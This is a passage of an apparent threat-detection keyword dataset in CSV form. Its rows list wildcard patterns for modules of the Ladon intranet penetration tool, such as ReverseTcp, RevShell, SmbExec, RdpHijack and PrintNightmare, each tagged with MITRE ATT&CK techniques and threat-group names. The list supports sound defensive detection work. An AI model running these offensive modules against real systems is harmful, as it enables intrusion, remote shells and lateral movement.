loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Open3389*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon PowerCat *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon PrintNightmare*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon psexec*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon QueryAdmin*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RdpHijack*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReadFile *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RegAuto*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReverseHttps*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon ReverseTcp *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RevShell-*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Runas*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon RunPS *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon sc *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SetSignAuth*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SmbExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon Sniffer*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,1,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SshExec *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon SweetPotato*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*Ladon TcpServer *,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
